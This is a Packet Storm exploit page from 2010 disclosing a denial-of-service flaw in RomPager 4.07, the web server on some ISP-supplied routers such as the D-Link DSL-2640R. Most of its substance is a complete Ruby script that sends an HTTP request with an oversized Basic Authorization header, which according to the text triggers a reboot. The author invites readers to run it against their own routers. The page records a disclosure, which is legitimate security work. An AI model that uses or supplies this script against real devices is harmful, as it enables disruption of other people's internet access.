exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

RomPager 4.07 Denial Of Service

RomPager 4.07 Denial Of Service
Posted Dec 8, 2010
Authored by Ricky-Lee Birtles

Rompager version 4.07 can have a reboot triggered when a specially crafted HTTP request is sent, leading to a denial of service condition.

tags | exploit, web, denial of service
SHA-256 | 7594f2f7f7806fd97a0a21bf001a9c3d88ffab017e8560d769771dd06d977d7f

RomPager 4.07 Denial Of Service

Change Mirror Download
Software: "RomPager/4.07 UPnP/1.0"

Issue: A reboot can be caused when a special crafted http request is sent.

Other Details: This version of RomPager is seen on a number of
residential routers that are shipped by a number of different ISP's.
The router I personal know it effects is the d-link DSL-2640R shipped
by virgin media. I also do believe this effects the d-link DSL-2641R.

I have made www.allegrosoft.com aware of the issue ( the creators of
RomPager ) and they have stated that version is very old and out dated
and should no longer be used and they stated they have been un able to
replicate the issue. This would lead me to believe it has something to
do with the ISP's customer firmware, I have contacted virgin media to
make them aware of the issue ( this was over a month ago ) so I am now
making this public.

If other people have a home router running the RomPager 4.07 software
please try the ruby script provided bellow and see if your router
restarts as well then add the make and module of router along with the
location this was obtained.

This is a assumption however I do think this could be further
exploited by close investigation with jtag access to the device,
however at the moment I am guessing the routers software watch dog
kicks in and restarts the router

Ruby Script:

require 'net/https'

url = URI.parse("http://IP/")
data = nil
headers = {
"Host" => "IP",
"Authorization" => "Basic
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
res = Net::HTTP.start(url.host, url.port) do |http|
http.use_ssl = false
http.send_request("GET", url.path, data, headers)
end

puts res.body

Regards,
-- Mr R Birtles

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close